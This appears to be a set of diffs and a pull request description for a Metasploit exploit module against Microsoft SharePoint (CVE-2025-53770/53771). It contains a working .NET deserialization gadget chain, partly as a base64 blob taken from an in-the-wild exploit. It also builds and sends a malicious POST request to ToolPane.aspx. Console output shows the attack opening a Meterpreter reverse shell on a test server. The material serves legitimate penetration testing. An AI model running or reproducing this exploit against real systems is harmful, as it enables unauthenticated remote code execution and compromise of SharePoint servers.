+    dataset_gadget_b64 = 'AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAABNTeXN0ZW0uRGF0YS5EYXRhU2V0AgAAAAlYbWxTY2hlbWELWG1sRGlmZkdyYW0BAQIAAAAGAwAAAKEKPHhzOnNjaGVtYSB4bWxucz0iIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zOm1zZGF0YT0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhIiBpZD0ic29tZWRhdGFzZXQiPg0KICAgICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9InNvbWVkYXRhc2V0IiBtc2RhdGE6SXNEYXRhU2V0PSJ0cnVlIiBtc2RhdGE6VXNlQ3VycmVudExvY2FsZT0idHJ1ZSI+DQogICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjaG9pY2UgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iaGVoZSI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJwd24iIG1zZGF0YTpEYXRhVHlwZT0iU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdGAxW1tTeXN0ZW0uRGF0YS5TZXJ2aWNlcy5JbnRlcm5hbC5FeHBhbmRlZFdyYXBwZXJgMltbU3lzdGVtLldlYi5VSS5Mb3NGb3JtYXR0ZXIsIFN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhXSxbU3lzdGVtLldpbmRvd3MuRGF0YS5PYmplY3REYXRhUHJvdmlkZXIsIFByZXNlbnRhdGlvbkZyYW1ld29yaywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzVdXSwgU3lzdGVtLkRhdGEuU2VydmljZXMsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0iIHR5cGU9InhzOmFueVR5cGUiIG1pbk9jY3Vycz0iMCIvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmNob2ljZT4NCiAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICA8L3hzOnNjaGVtYT4GBAAAAMtHPGRpZmZncjpkaWZmZ3JhbSB4bWxuczptc2RhdGE9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLW1zZGF0YSIgeG1sbnM6ZGlmZmdyPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSI+DQogICAgICAgICAgICAgICAgPHNvbWVkYXRhc2V0Pg0KICAgICAgICAgICAgICAgICAgICA8aGVoZSBkaWZmZ3I6aWQ9IlRhYmxlIiBtc2RhdGE6cm93T3JkZXI9IjAiIGRpZmZncjpoYXNDaGFuZ2VzPSJpbnNlcnRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICA8cHduIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZFdyYXBwZXJPZkxvc0Zvcm1hdHRlck9iamVjdERhdGFQcm92aWRlciB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiA+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZEVsZW1lbnQvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8UHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE1ldGhvZE5hbWU+RGVzZXJpYWxpemU8L01ldGhvZE5hbWU+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8TWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YW55VHlwZSB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4c2k6dHlwZT0ieHNkOnN0cmluZyI+SEFYPC9hbnlUeXBlPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9NZXRob2RQYXJhbWV0ZXJzPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE9iamVjdEluc3RhbmNlIHhzaTp0eXBlPSJMb3NGb3JtYXR0ZXIiPjwvT2JqZWN0SW5zdGFuY2U+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvUHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvRXhwYW5kZWRXcmFwcGVyT2ZMb3NGb3JtYXR0ZXJPYmplY3REYXRhUHJvdmlkZXI+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3B3bj4NCiAgICAgICAgICAgICAgICAgICAgPC9oZWhlPg0KICAgICAgICAgICAgICAgIDwvc29tZWRhdGFzZXQ+DQogICAgICAgICAgICA8L2RpZmZncjpkaWZmZ3JhbT4L'
+
+    dataset_gadget_raw = Base64.strict_decode64(dataset_gadget_b64)
+
+    # We have replaced the original payload from the in-the-wild exploit, with a string value "HAX". We use that "HAX"
+    # value to swap in our TypeConfuseDelegate gadget chain, and then fix up the string lengths.
+    dataset_gadget_raw.gsub!(
+      'HAX',
+      typeconfusedelegate_gadget_b64
+    ).gsub!(
+      Msf::Util::DotNetDeserialization.encode_7bit_int(9163),
+      Msf::Util::DotNetDeserialization.encode_7bit_int(9163 - 7772 + typeconfusedelegate_gadget_b64.length)
+    )
+
+    vprint_status('Using XmlSchema DataSet + BinaryFormatter gadget chain:')
+    vprint_line(Rex::Text.to_hex_dump(dataset_gadget_raw))
+
+    dataset_gadget_raw
+  end
+
+  def send_exploit(gadget_raw)
+    gadget_gzip = StringIO.new
+
+    gzip = Zlib::GzipWriter.new(gadget_gzip)
+    gzip.write(gadget_raw)
+    gzip.close
+
+    namespace_ui = Rex::Text.rand_text_alpha_lower(8..16)
+    namespace_scorecards = Rex::Text.rand_text_alpha_lower(8..16)
+
+    xml = <<~EOF
+      <%@ Register Tagprefix="#{namespace_ui}" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
+      <%@ Register Tagprefix="#{namespace_scorecards}" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
+        <#{namespace_ui}:UpdateProgress>
+          <ProgressTemplate>
+            <#{namespace_scorecards}:ExcelDataSet CompressedDataTable="#{Base64.strict_encode64(gadget_gzip.string)}" DataTable-CaseSensitive="true" runat="server"/>
+          </ProgressTemplate>
+        </#{namespace_ui}:UpdateProgress>
+    EOF
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'ToolPane.aspx'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'Referer' => normalize_uri(target_uri.path, '_layouts', 'SignOut.aspx')
+      },
+      'vars_get' => {
+        'DisplayMode' => 'Edit',
+        'a' => '/ToolPane.aspx'
+      },
+      'vars_post' => {
+        'MSOTlPn_Uri' => full_uri(normalize_uri(target_uri.path, '_controltemplates', '15', 'AclEditor.ascx')),
+        'MSOTlPn_DWP' => xml
+      }
+    )
+  end
+end

--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -38,6 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2025-53771'],
           # Technical analysis of CVE-2025-49704 and CVE-2025-49706 by the original finder, Dinh Ho Anh Khoa (Viettel Cyber Security).
           ['URL', 'https://blog.viettelcybersecurity.com/sharepoint-toolshell/'],
+          # LeakIX blog which captured the malicious request for the in-the-wild exploit.
+          ['URL', 'https://blog.leakix.net/2025/07/using-their-own-weapons-for-defense-a-sharepoint-story/'],
           # ZDI advisories for CVE-2025-49704 and CVE-2025-49706, discovered by Viettel Cyber Security.
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-580/'],
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-581/'],

--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -169,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
       name_c = Rex::Text.rand_text_alpha_lower(8..16)
 
       # The msdata:DataType attribute below is CVE-2025-49704, and allows bypassing a filter list so we can instantiate
-      # LosFormatter and ObjectDataProvider in the diffgr:diffgram XML document below, allowing us to kcik off a second
+      # LosFormatter and ObjectDataProvider in the diffgr:diffgram XML document below, allowing us to kick off a second
       # stage deserialization gadget (which will be a TypeConfuseDelegate + LosFormatter gadget chain).
       schema = <<~EOF
         <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="#{name_a}">

--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -153,6 +153,96 @@ class MetasploitModule < Msf::Exploit::Remote
     send_exploit(gadget_raw)
   end
 
+  # This gadget chain was reconstructed from the PoC posted here (https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501)
+  # and is thought to be from the zero-day exploit caught in-the-wild. The payload from the in-the-wild gadget chain has
+  # been removed, and we instead use our nested_gadget_b64 to execute a Metasploit payload (via a separate
+  # TypeConfuseDelegate gadget chain).
+  class DataSetWrapper < Msf::Util::DotNetDeserialization::Types::SerializedStream
+
+    def self.generate(nested_gadget_b64)
+      name_a = Rex::Text.rand_text_alpha_lower(8..16)
+      name_b = Rex::Text.rand_text_alpha_lower(8..16)
+      name_c = Rex::Text.rand_text_alpha_lower(8..16)
+
+      schema = <<~EOF
+        <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="#{name_a}">
+          <xs:element name="#{name_a}" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
+              <xs:complexType>
+                  <xs:choice minOccurs="0" maxOccurs="unbounded">
+                      <xs:element name="#{name_b}">
+                          <xs:complexType>
+                              <xs:sequence>
+                                  <xs:element name="#{name_c}" msdata:DataType="System.Collections.Generic.List`1[[System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" type="xs:anyType" minOccurs="0"/>
+                              </xs:sequence>
+                          </xs:complexType>
+                      </xs:element>
+                  </xs:choice>
+              </xs:complexType>
+          </xs:element>
+        </xs:schema>
+      EOF
+
+      diffgram = <<~EOF
+        <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
+            <#{name_a}>
+                <#{name_b} diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
+                    <#{name_c} xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
+                        <ExpandedWrapperOfLosFormatterObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" >
+                            <ExpandedElement/>
+                            <ProjectedProperty0>
+                                <MethodName>Deserialize</MethodName>
+                                <MethodParameters>
+                                    <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">#{nested_gadget_b64}</anyType>
+                                </MethodParameters>
+                                <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
+                            </ProjectedProperty0>
+                        </ExpandedWrapperOfLosFormatterObjectDataProvider>
+                    </#{name_c}>
+                </#{name_b}>
+            </#{name_a}>
+        </diffgr:diffgram>
+      EOF
+
+      system = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0'].fetch('System.Data')
+
+      library = Msf::Util::DotNetDeserialization::Types::RecordValues::BinaryLibrary.new(
+        library_id: 2,
+        library_name: system.to_s
+      )
+
+      from_values([
+        Msf::Util::DotNetDeserialization::Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),
+        library,
+        Msf::Util::DotNetDeserialization::Types::RecordValues::ClassWithMembersAndTypes.new(
+          class_info: Msf::Util::DotNetDeserialization::Types::General::ClassInfo.new(
+            obj_id: 1,
+            name: 'System.Data.DataSet',
+            member_names: %w[XmlSchema XmlDiffGram]
+          ),
+          member_type_info: Msf::Util::DotNetDeserialization::Types::General::MemberTypeInfo.new(
+            binary_type_enums: %i[String String]
+          ),
+          library_id: library.library_id,
+          member_values: [
+            Msf::Util::DotNetDeserialization::Types::Record.from_value(
+              Msf::Util::DotNetDeserialization::Types::RecordValues::BinaryObjectString.new(
+                obj_id: 3,
+                string: schema
+              )
+            ),
+            Msf::Util::DotNetDeserialization::Types::Record.from_value(
+              Msf::Util::DotNetDeserialization::Types::RecordValues::BinaryObjectString.new(
+                obj_id: 2,
+                string: diffgram
+              )
+            ),
+          ]
+        ),
+        Msf::Util::DotNetDeserialization::Types::RecordValues::MessageEnd.new
+      ])
+    end
+  end
+
   def create_gadget_chain
     # NOTE: Depending on the version of SharePoint, different gadgets can be used.
     #
@@ -174,24 +264,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     typeconfusedelegate_gadget_b64 = Base64.strict_encode64(typeconfusedelegate_gadget_raw)
 
-    # This gadget chain was pulled from the PoC posted here (https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501)
-    # and is thought to be from the zero-day exploit caught in-the-wild. The payload from the in-the-wild gadget has
-    # been removed and replaced with a string value "HAX".
-    #
-    # TO-DO: get rid of this base64 blob, and construct the gadget using the Msf::Util::DotNetDeserializatio helper routines.
-    dataset_gadget_b64 = 'AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAABNTeXN0ZW0uRGF0YS5EYXRhU2V0AgAAAAlYbWxTY2hlbWELWG1sRGlmZkdyYW0BAQIAAAAGAwAAAKEKPHhzOnNjaGVtYSB4bWxucz0iIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zOm1zZGF0YT0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhIiBpZD0ic29tZWRhdGFzZXQiPg0KICAgICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9InNvbWVkYXRhc2V0IiBtc2RhdGE6SXNEYXRhU2V0PSJ0cnVlIiBtc2RhdGE6VXNlQ3VycmVudExvY2FsZT0idHJ1ZSI+DQogICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjaG9pY2UgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iaGVoZSI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJwd24iIG1zZGF0YTpEYXRhVHlwZT0iU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdGAxW1tTeXN0ZW0uRGF0YS5TZXJ2aWNlcy5JbnRlcm5hbC5FeHBhbmRlZFdyYXBwZXJgMltbU3lzdGVtLldlYi5VSS5Mb3NGb3JtYXR0ZXIsIFN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhXSxbU3lzdGVtLldpbmRvd3MuRGF0YS5PYmplY3REYXRhUHJvdmlkZXIsIFByZXNlbnRhdGlvbkZyYW1ld29yaywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzVdXSwgU3lzdGVtLkRhdGEuU2VydmljZXMsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0iIHR5cGU9InhzOmFueVR5cGUiIG1pbk9jY3Vycz0iMCIvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmNob2ljZT4NCiAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICA8L3hzOnNjaGVtYT4GBAAAAMtHPGRpZmZncjpkaWZmZ3JhbSB4bWxuczptc2RhdGE9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLW1zZGF0YSIgeG1sbnM6ZGlmZmdyPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSI+DQogICAgICAgICAgICAgICAgPHNvbWVkYXRhc2V0Pg0KICAgICAgICAgICAgICAgICAgICA8aGVoZSBkaWZmZ3I6aWQ9IlRhYmxlIiBtc2RhdGE6cm93T3JkZXI9IjAiIGRpZmZncjpoYXNDaGFuZ2VzPSJpbnNlcnRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICA8cHduIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZFdyYXBwZXJPZkxvc0Zvcm1hdHRlck9iamVjdERhdGFQcm92aWRlciB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiA+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZEVsZW1lbnQvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8UHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE1ldGhvZE5hbWU+RGVzZXJpYWxpemU8L01ldGhvZE5hbWU+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8TWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YW55VHlwZSB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4c2k6dHlwZT0ieHNkOnN0cmluZyI+SEFYPC9hbnlUeXBlPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9NZXRob2RQYXJhbWV0ZXJzPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE9iamVjdEluc3RhbmNlIHhzaTp0eXBlPSJMb3NGb3JtYXR0ZXIiPjwvT2JqZWN0SW5zdGFuY2U+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvUHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvRXhwYW5kZWRXcmFwcGVyT2ZMb3NGb3JtYXR0ZXJPYmplY3REYXRhUHJvdmlkZXI+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3B3bj4NCiAgICAgICAgICAgICAgICAgICAgPC9oZWhlPg0KICAgICAgICAgICAgICAgIDwvc29tZWRhdGFzZXQ+DQogICAgICAgICAgICA8L2RpZmZncjpkaWZmZ3JhbT4L'
-
-    dataset_gadget_raw = Base64.strict_decode64(dataset_gadget_b64)
-
-    # We have replaced the original payload from the in-the-wild exploit, with a string value "HAX". We use that "HAX"
-    # value to swap in our TypeConfuseDelegate gadget chain, and then fix up the string lengths.
-    dataset_gadget_raw.gsub!(
-      'HAX',
-      typeconfusedelegate_gadget_b64
-    ).gsub!(
-      Msf::Util::DotNetDeserialization.encode_7bit_int(9163),
-      Msf::Util::DotNetDeserialization.encode_7bit_int(9163 - 7772 + typeconfusedelegate_gadget_b64.length)
-    )
+    dataset_gadget_raw = DataSetWrapper.generate(typeconfusedelegate_gadget_b64).to_binary_s
 
     vprint_status('Using XmlSchema DataSet + BinaryFormatter gadget chain:')
     vprint_line(Rex::Text.to_hex_dump(dataset_gadget_raw))


### PR DESCRIPTION
## Overview
This ~(draft)~ pull request adds an exploit module for the recent unauthenticated RCE exploit chain affecting Microsoft SharePoint Server via CVE-2025-53770 and CVE-2025-53771 (which are patch bypasses of two recent vulns CVE-2025-49704 and CVE-2025-49706).

This module is based on the zero-day exploit that was caught in-the-wild circa July 19, 2025. A single HTTP request of the exploit was posted here (https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501).

## To-Do
 - [x] Part of the gadget chain is taken from the in-the-wild exploit and is currently a base64 blob. We can reimplement it using the Metasploit `Msf::Util::DotNetDeserialization` routines and clean it up a little.
 - [x] Evaluate options for delivering an in-memory payload, rather than just  `ARCH_CMD` payloads.
   -  As per this comment, we already have in-memory Powershell payloads: https://github.com/rapid7/metasploit-framework/pull/20409#issuecomment-3110206522
 - [x] Documentation

## Example 1 (cmd/windows/http/x64/meterpreter_reverse_tcp)
```
msf exploit(windows/http/sharepoint_toolpane_rce) > show options 

Module options (exploit/windows/http/sharepoint_toolpane_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                           no        Comma-separate list of extensions to load
   EXTINIT                              no        Initialization strings for extensions
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ccMNrNsj         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.86.122   yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


Exploit target:

   Id  Name
   --  ----
   0   Default



View the full module info with the info, or info -d command.

msf exploit(windows/http/sharepoint_toolpane_rce) > check
[*] 192.168.86.50:80 - The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
msf exploit(windows/http/sharepoint_toolpane_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
[*] Meterpreter session 3 opened (192.168.86.122:4444 -> 192.168.86.50:62290) at 2025-07-23 12:58:41 +0100

meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : TESTDOMAIN
Logged On Users : 24
Meterpreter     : x64/windows
meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > 
```

## Example 2 (cmd/windows/generic)
```
msf exploit(windows/http/sharepoint_toolpane_rce) > show options 

Module options (exploit/windows/http/sharepoint_toolpane_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/windows/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   notepad.exe      yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Default



View the full module info with the info, or info -d command.

msf exploit(windows/http/sharepoint_toolpane_rce) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
[*] Exploit completed, but no session was created.
msf exploit(windows/http/sharepoint_toolpane_rce) >
```

<img width="1153" height="114" alt="image" src="https://github.com/user-attachments/assets/e0325709-bd5a-4820-bc7d-642f4ce97c7f" />
